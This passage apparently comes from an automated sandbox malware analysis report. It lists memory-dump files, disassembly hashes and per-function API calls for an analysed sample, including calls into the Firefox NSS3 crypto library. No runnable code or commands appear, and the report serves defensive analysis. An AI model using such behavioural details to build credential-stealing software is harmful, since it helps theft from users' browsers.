                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                                                            • String ID: vn
                                                                                                                                                                                                                                                            • API String ID: 3213747228-928908979
                                                                                                                                                                                                                                                            • Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                                                                                                            • Instruction ID: ea8ac3fc18d8785fce26af9bbdd0fa18b37ba5f379e2f881928ef016b3cbf6f5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45B113329063C59FDB118F2AC841BFEBBA6EF45360F2441AAE854EB341D6359D03CB94
                                                                                                                                                                                                                                                            Function 006B2EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Mtx_unlock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1418687624-0
                                                                                                                                                                                                                                                            • Opcode ID: b8355596cda88da5a229cd8904d0d57d4a1bb554a15d750a87f13bda2b63beb2
                                                                                                                                                                                                                                                            • Instruction ID: a305be4bd7a86da362872ed282914605d24b5afe2203ac7f545cac37183617fa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8355596cda88da5a229cd8904d0d57d4a1bb554a15d750a87f13bda2b63beb2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EA1F3B0A016259FDB10DF69C944BEAB7EAFF15324F04812DE819D7341EB35EA44CB91
                                                                                                                                                                                                                                                            Function 006EF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                                            • String ID: 8"q$`'q
                                                                                                                                                                                                                                                            • API String ID: 3903695350-309746063
                                                                                                                                                                                                                                                            • Opcode ID: 0b602e6e11157c4345d2f06ee579b4d65c8ac23d27197e68aa63b206db41b677
                                                                                                                                                                                                                                                            • Instruction ID: c02867a7b9995c32574fd6ad0272e7462e145342406da47c39a07cf81803f25b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b602e6e11157c4345d2f06ee579b4d65c8ac23d27197e68aa63b206db41b677
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3316731602381DFEB21AB7AD845B9B73EAFF00312F20442DF049D6692DE70AC808B65

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 6BF08A30 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 393memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF08A58
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BF08AC6
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000044), ref: 6BF08ADF
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000004,?), ref: 6BF08B19
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6BF08B2D
                                                                                                                                                                                                                                                            • PK11_GenerateRandom.NSS3(00000000,00000010), ref: 6BF08B49
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000010,00000000), ref: 6BF08B61
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeInteger_Util.NSS3(00000000,0000001C), ref: 6BF08B83
                                                                                                                                                                                                                                                            • SECOID_SetAlgorithmID_Util.NSS3(00000000,-0000002C,?,00000000), ref: 6BF08BA0
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF08BF0
                                                                                                                                                                                                                                                            • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6BF08BF9
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6BF08C13
                                                                                                                                                                                                                                                            • HASH_ResultLenByOidTag.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6BF08C3A
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BF08CA7
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF08CC4
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6BF08D12
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF08D20
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6BF08D40
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6BF08D99
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE006,00000000), ref: 6BF08DBF
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000123,00000018), ref: 6BF08DD5
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(?,?,00000000,6BFED864), ref: 6BF08E39
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BF1F0C8
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BF1F122
                                                                                                                                                                                                                                                            • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,?), ref: 6BF08E5B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6BECE708,00000000,00000000,00000004,00000000), ref: 6BF1BE6A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6BED04DC,?), ref: 6BF1BE7E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6BF1BEC2
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6BFED8C4), ref: 6BF08E94
                                                                                                                                                                                                                                                            • SECOID_SetAlgorithmID_Util.NSS3(?,00000000,00000000,?), ref: 6BF08EAC
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000018), ref: 6BF08EBA
                                                                                                                                                                                                                                                            • SECOID_CopyAlgorithmID_Util.NSS3(00000000,00000000,00000000), ref: 6BF08ECC
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6BF08EE1
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6BF08EF4
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF08EFD
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6BF08F11
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6BF08F1C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Arena_Item_$Free$AlgorithmAlloc_ArenaCopyEncodeFindTag_$ErrorZfree$Integer_$GenerateHashInitK11_LockPoolRandomResultTypecallocfree
                                                                                                                                                                                                                                                            • String ID: tFVPj
                                                                                                                                                                                                                                                            • API String ID: 2709086113-199373283
                                                                                                                                                                                                                                                            • Opcode ID: 69a73ca030c14407360973da9bbc29124dca472c9f40f4c9a2b74d8d0aecb832
                                                                                                                                                                                                                                                            • Instruction ID: 8ce65ab0967dd7b9332dc40828561d024ec789d03e4893489d5639f99c3f4f75
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69a73ca030c14407360973da9bbc29124dca472c9f40f4c9a2b74d8d0aecb832
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32D1E5B3905301ABEB008F34DC91B6B77E8EF55344F004A69EC58C62B1FB7DD5549A62
                                                                                                                                                                                                                                                            Function 6BF19BB0 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 452stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(83000070,?,?,00000000,?,?,?,?,6BF12403,00000010,?,6BF1990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000), ref: 6BF19C18
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6BF12403,00000010,?,6BF1990F,0000003B,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~:[]@!$'()*+,=&,?,00000000,00000010,?,6BF12403), ref: 6BF19C67
